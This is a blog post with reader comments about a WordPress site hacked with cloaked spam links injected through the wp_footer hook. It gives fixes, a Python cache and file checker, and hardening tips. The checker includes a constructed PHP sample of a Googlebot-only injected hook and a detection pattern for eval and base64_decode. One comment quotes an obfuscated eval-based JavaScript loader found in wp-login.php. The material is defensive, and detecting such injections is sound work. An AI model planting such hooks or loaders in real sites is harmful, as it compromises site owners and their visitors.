Has Your Wordpress Blog Been Hacked?
If you own a WordPress blog, you may have been hacked, and what's worse, you may not even know that you have been exploited.
This happened to me recently, and today I want to make sure that every WordPress reader not only knows how to detect this problem, but also how to fix it and how to protect their site from future attacks.

Ok, here is the thing… like most marketers, my technical skills are not very good, but, like most marketers, I have a lot of very useful contacts. So I contacted a good friend of mine, Paul from SEOidiot.
Paul takes up the story below:
What Happened To DeanHunt.com – By Paul
Here's the technical side of what they did and what we did to get around it, plus a brief explanation of what I coded to try and give people the chance to check for themselves:
WordPress uses calls to wp_head and wp_footer to allow plugins to alter the content being returned as the page loads; a good example of this working well is the SEO Title Tags plugin. However, this is the functionality that the spammers used to insert a whole raft of links into the footer.
This article [http://linux.byexamples.com/archives/397/wordpress-exploit-we-been-hit-by-hidden-spam-link-injection/] explains the technique for anyone who likes headaches, but in basic terms they are using compromised theme files, or adding new files to your compromised server, which act on the wp_footer call to insert their links.
They have been even smarter than that, though, as they have cloaked the links, so if you pop over to your own hacked site and view the source code you won't see the inserted links. Only when Googlebot comes along are the links shown, which is obviously a bad thing, as Google suddenly thinks you're linking out to a bunch of parasite-hosted pills sites and will give you a penalty or remove you as a result.
Note: Dean’s rankings were virtually wiped out in Google
The Solution
So how do you solve this? On a dedicated box you can trawl through searching for the files known to be compromised, but a simpler and easier method is to remove the wp_footer call from the footer.php file in your current theme.
There are very few plugins that do anything useful in the footer, so this made sense for Dean. If it had been wp_head that was inserting links, we would have needed to get the host to find the dodgy files, or perhaps to have moved to a clean install somewhere else.
Because it isn't easy for people to detect when they have been hacked this way, I wrote a little tool to show people what their Google cache thinks are links out from your page. You can find this free tool at http://www.seoidiot.co.uk/cachecheker/
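The two checks Paul describes (what Googlebot is shown versus what you see, and the hook that does the showing) written out as a script. This is an added example, not Paul's cache checker and not WordPress code. It compares the outbound links in a page fetched with a browser User-Agent against the same page fetched as Googlebot, and greps theme or plugin PHP for a wp_footer/wp_head callback that sits beside a User-Agent check or eval()/base64_decode(). The sample page, the injected-hook PHP and the function names are constructed for the example, and the indicator list is a heuristic rather than a signature of any particular attack.

```python
#!/usr/bin/env python3
"""Added example (not Paul's cache checker, not WordPress code): two checks for
the cloaked wp_footer link injection described above.  Sample HTML and PHP
are constructed for the example; the indicator list is a heuristic."""
import re
import urllib.request
from html.parser import HTMLParser
from urllib.parse import urlparse

GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:115.0) Gecko/20100101 Firefox/115.0"


class _LinkCollector(HTMLParser):
    """Collect every <a href>, hidden (display:none) or not."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def external_links(html, site_host):
    """Absolute hrefs in `html` pointing at a host other than `site_host`."""
    parser = _LinkCollector()
    parser.feed(html)
    found = set()
    for href in parser.hrefs:
        host = urlparse(href).netloc.lower()
        if host and host != site_host.lower():
            found.add(href)
    return found


def find_cloaked_links(html_as_browser, html_as_bot, site_host):
    """Check 1: off-site links served to Googlebot but not to a normal visitor."""
    return sorted(external_links(html_as_bot, site_host)
                  - external_links(html_as_browser, site_host))


def fetch(url, user_agent):
    """Fetch `url` under a chosen User-Agent (live use; the demo below is offline)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=20) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Check 2: a callback registered on the two template actions the post names,
# in the same file as crawler detection or runtime code evaluation.
HOOK_RE = re.compile(r"add_action\s*\(\s*['\"](wp_footer|wp_head)['\"]", re.I)
INDICATOR_RE = re.compile(
    r"HTTP_USER_AGENT|googlebot|eval\s*\(|base64_decode\s*\(|gzinflate\s*\(|str_rot13\s*\(", re.I)


def scan_theme_source(php_source):
    """Return (hooks, indicators) for one PHP file, both sorted and lower-cased."""
    hooks = sorted({m.group(1).lower() for m in HOOK_RE.finditer(php_source)})
    indicators = sorted({m.group(0).lower() for m in INDICATOR_RE.finditer(php_source)})
    return hooks, indicators


def is_suspicious(php_source):
    """A hook plus at least one indicator in the same file is worth a manual look."""
    hooks, indicators = scan_theme_source(php_source)
    return bool(hooks) and bool(indicators)


# Constructed sample page: what a browser sees, then the same page with the
# hidden block that only Googlebot is served.
SITE = "www.example.com"
PAGE_BROWSER = """<html><body>
<a href="/about/">About</a>
<a href="http://wordpress.org/">WordPress</a>
</body></html>"""
PAGE_BOT = PAGE_BROWSER.replace("</body>", (
    '<div style="display:none">'
    '<a href="http://pills.example.net/buy">cheap pills</a>'
    '<a href="http://pills.example.net/rx">rx</a></div></body>'))

# Constructed injected hook (illustrative, not real malware) and a clean footer.php.
INJECTED_PHP = r"""<?php
add_action('wp_footer', 'x7_footer');
function x7_footer() {
    if (stripos($_SERVER['HTTP_USER_AGENT'], 'googlebot') !== false) {
        echo base64_decode($GLOBALS['x7_payload']);
    }
}
"""
CLEAN_PHP = "<?php\nadd_action('wp_footer', 'my_theme_footer_credits');\n"

if __name__ == "__main__":
    print("cloaked:", find_cloaked_links(PAGE_BROWSER, PAGE_BOT, SITE))
    print("injected.php:", is_suspicious(INJECTED_PHP), " footer.php:", is_suspicious(CLEAN_PHP))
```

For a live site, call find_cloaked_links(fetch(url, BROWSER_UA), fetch(url, GOOGLEBOT_UA), host). One caveat: some injections cloak on the crawler's source IP rather than the User-Agent string, so a spoofed User-Agent can come back clean while Google's cached copy still shows the links; that is the reason to check the cache, as Paul's tool does, rather than rely on the User-Agent trick alone. The file scan is the cheaper cure than deleting the wp_footer() call outright, because it points at the file to remove instead of silencing every plugin that uses the hook.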
Back to Dean….
So, in a nutshell, your WordPress blog may have been hacked, and the usual checks won't show anything wrong. You may only realise something is wrong once you have been booted out of Google.
I am happy to announce that my Google rankings returned within 4 days of the offending spam being removed, which just shows once more why Google are by far the king of the search world.
So how can you prevent this happening to your WordPress site?
Firstly, and perhaps most importantly, make sure your WordPress installation is up to date. If you stay on the latest version at all times, you stand a much better chance of never having these issues.
For the more technically minded amongst you, I got some great tips from Matt Cutts, and I hope that, considering the circumstances, Matt won't mind me posting his tips below:
- Secure your /wp-admin/ directory. What I’ve done is lock down /wp-admin/ so that only certain IP addresses can access that directory. I use an .htaccess file, which you can place directly at /wp-admin/.htaccess . This is what mine looks like:
AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName "Access Control"
AuthType Basic
order deny,allow
deny from all
# whitelist home IP address
allow from 64.233.169.99
# whitelist work IP address
allow from 69.147.114.210
allow from 199.239.136.200
# IP while in Kentucky; delete when back
allow from 128.163.2.27
I’ve changed the IP addresses, but otherwise that’s what I use. This file says that the IP address 64.233.169.99 (and the other IP addresses that I’ve whitelisted) are allowed to access /wp-admin/, but all other IP addresses are denied access. Has this saved me from being hacked before? Yes.
- Make an empty wp-content/plugins/index.html file. Otherwise you leak information on which plug-ins you run. If someone wanted to hack your blog, they might be able to do it by discovering that you run an out-of-date plugin on your blog and then they could exploit that.
- Subscribe to the WordPress Development blog at http://wordpress.org/development/feed/ . When WordPress patches a security hole or releases a new version, they announce it on that blog. If you see a security patch released, you need to upgrade or apply the patch. You leave yourself open to being hacked if you don’t upgrade.
And here’s a bonus tip: in the header.php file for your theme, you might want to check for a line like
<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" /> <!-- leave this for stats please -->
I’d just go ahead and delete that line or at least the bloginfo(’version’). If you’re running an older version of WordPress, anyone can view source to see what attacks might work against your blog.
Credit to Matt, Reuben and my buddy ShoeMoney. I also got a lot of assistance from David Geere from the awesome EatingBritain. Oh, and David Naylor was incredibly helpful as well. Thanks David.
What’s Next For My WordPress Site’s Security?
Dave and I are looking to do a fresh install of WordPress, and we will also be looking into any plugins that can further assist us.
If you have any advice or tips based on the above, please leave them in the comments box. Also, send this post to any friends who have a Wordpress site, I would hate for them to go through the hell that I had to suffer.
A wise man once told me: “what doesn’t kill you, only makes you stronger”, together we can ensure we are all strong enough to avoid this sort of issue in future.
Dean
35 COMMENTS
Thanks for the tool, Paul – look at fixing the posted link though. Checked a few of my blogs and they’re looking okay for now.
Dean, thanks for getting the word out. I’m digging the article.
Thanks for the post and detailed explanation Dean… and glad to hear you’ve got it sorted!
*runs off to check his blogs*
Link fixed, thanks Nathan.
make sure you all use the free tool to check your sites.
There are a lot more things you can do as well with security, and an easier way to not display the directory structure for folders that do not contain an index file.
Visit my site for more info:
http://www.steven-sanders.com/establishing-a-sense-of-security-on-your-blog/
hi there,
I just wonder: inside cPanel there is a feature called “Index Manager”. I found that it’s very useful; we can set “No indexing” for those folders that we don’t want Google to index.
what do you think ?
Jo,
Yes, that would help… I think Steven mentions something similar in his post (see above).
Dean
Thanks for sharing this with us Dean! I’ll run to my blog right away to make sure it’s OK and will tag your post on Stumble Upon too.
Many thanks,
Joel Commm just mentioned it on his Facebook profile, and it is buzzing around Twitter as well.
Dean
I use the Exploit Scanner plugin for Wordpress found here:
http://ocaoimh.ie/exploit-scanner/
I was hacked in a way that they were able to insert invisible links into the last post made. They didn’t add them to any other posts, just the last one, and it included iframes that loaded malware. I had sites that didn’t just get penalized by Google, but that Google BLOCKED users completely from because they were dangerous.
I did a clean install on all the blogs affected, then installed this plugin and run it regularly.
Thanks for sharing your story and the tool Dean. I also sent out a tweet on twitter referencing this post.
You need to find new hamsters, or better crack, I reckon
Thanks Rob,
You are a gent. We gotta play some golf some time.
Dean
How about my Google Alerts solution?
http://www.blogstorm.co.uk/how-to-use-google-alerts-to-find-out-if-your-site-gets-hacked/
Patrick,
Interesting theory.
My concern would be the terms used were quite niche pills, so you would need a list of 50-100 of the main ones, and inputting all of that would be time consuming.
That said, I am sure someone can create a script to automate it.
Dean
There is nothing worse than showing up to your website and seeing a bunch of links to some spam site.
Very true Axethem.
Unfortunately these were not even visible links.
Dean
Hi Dean,
this is exactly what happened to me several months ago. The thing was there were no links visible on the site but after seeing my PR suddenly drop from 4 to 0 I checked the code source and there it was. Bunch of links to crappy sites. I was able to fix the problem and now I check everything on regular basis.
Thanks for the tool and info, it really helps.
By the way how did you manage to get your PR back to 5 so quickly? My site has never recovered and remains PR 0.
or – instead of doing all of the above…
you just get yourself on a more advanced blogging platform http://BLOGi360.com
Most people don’t realize WordPress is one of the most hackable blogging platforms out there.
Security is of utmost importance if information on your blog supports your business.
TX 4 sharing this.
I’ll go retweet now…
This happened to me!!! My site was hacked and was eventually blocked by Google as “evil”. Even moving it to another web address did not help. I finally moved to Typepad and am paying a fee to keep these evil doers out of my creations! Wished I had seen this blog 3 months ago!
Pay attention everyone on Wordpress!!!
Linda P. Taylor
http://www.LindaPTaylor.com
Blog: http://www.AskLindaPTaylor.com
Thanks a bunch for this dude, I know how you feel. It has happened to me several times now.
I know this may not be the correct forum for this, but can anyone help? I followed the .htaccess route above, replacing the IP with the one shown for me at http://www.whatismyip.com, and it locks me out completely. I have to use FTP to delete the file.
Am I missing something? Any ideas?
Nice tips, particularly about the .htaccess file in the wp-admin directory. Cheers
Sorry – never mind! I copied and pasted from above, but it has “ rather than ”
All set now.
A wise man? So you spoke with Nietzsche directly?
Where is the text, urls, etc, usually stored? (I mean the dodgy ones from the attacker) In the db or in one of the files?
If the text is stored in a file, a regular cron job to grep for keywords might be the go, otherwise if it’s in the db, it’s a little more work, but a regular db search would be handy.
I’m interested in developing something i can run on my server automagically, rather than manually checking.
I discovered yesterday when logging into wp-login that someone had hacked several of my WP blogs. These sites are all running the latest version of wordpress.
The hackers have somehow put a line of code into wp-login.php (see below)
!function tzhrbn15(p) {var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,37,0,36,5,43,54,33,1,62,0,0,0,0,0,0,25,17,21,41,51
,52,49,40,46,53,30,4,31,29,35,56,27,38,45,44,47,24,32,10,34,58,3,0,0,0,0,18,0,50,7,2,14,12,19,22,
23,13,11,59,15,6,48,61,8,39,57,28,20,60,26,55,42,16,9);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<>=8;d-=2}else{d=6}}}eval(c);}}tzhrbn15('@LenWbs626R6l5o6Ml@XxbenjqU1WbsDPlua25iV@DoFvTS7zW
rFpDoDZTSN20unjlrDjNuqiwSNMDMDfaGFv5RwtmUV@9SaWLS6bben2JenpbsVvbU3zgOOl5RF2aMnPZSa
md9DvPeVs0enWbunmJp7vJr1Mar74QODjNuqiwsX4QpNdQoFW5RFfx@qgYGFjLsam5o3L9CQd6R6hjuafa
GabwRwc0uItcsn2TeNyW@VbNewlluayQO7')
Is this the same hack ?
Thanks
Adsense Idiot
I checked my wp-login.php, and I couldn’t find anything wrong with it.
Thanks Dean,
I also found this malicious script in my theme folder in header.php and footer.php
Thanks for your reply
Most all blog hacks are from people not upgrading their blog software.
If you don’t make a ton of changes, just back up your template one time, then create or download a script to email you a database dump every couple of days.
http://www.hackerforums.org
My mate’s WordPress blog got hacked a while ago… it just redirects to some Russian search engine now. Dunno how to fix it.
In different blogs, hacking can be done. Beware of this while writing your blogs.
A few tips to help bloggers stay hack free.
#1 Backup your database once a week, or get a script to email it to you automatically.
#2 Keep your blog software up-to-date.
#3 Use stronger passwords: 2 uppercase, 2 lowercase, 2 numbers, 2 special characters should do it.
Spending a few minutes a week doing this can save a lot of trouble from hackers in the long run.
Hacker Forums
Well guys, thanks for your good information. I have come across a similar situation. I was searching the web to get some ideas and finally found the following link, which also has three good articles on the malware problem, scanning and security…
http://www.itoneworldsystem.com/blog/2009/01/29/how-to-scan-blogweb-site-for-malicious-codes/
Thanks for this post – I just checked all my WP sites using the tool you linked to, and a couple of my old WP blogs which I haven’t touched in ages do indeed have dodgy footer links. One of them is even displaying pharma-related Adsense ads! I will be more diligent about keeping all my WP sites updated from now on.
Very interesting post. I run 4-5 WordPress sites/blogs and always try to update my system, but there are still some new and useful tips here.
I really like wordpress, but if so many people use a product – then it attracts the hackers.
Steen Öhman
Öhman Research – online marketing
Denmark
It’s the first time I have commented here and I must say you share genuine, quality information for bloggers! Good job.
p.s. You have a very good template for your blog. Where did you find it?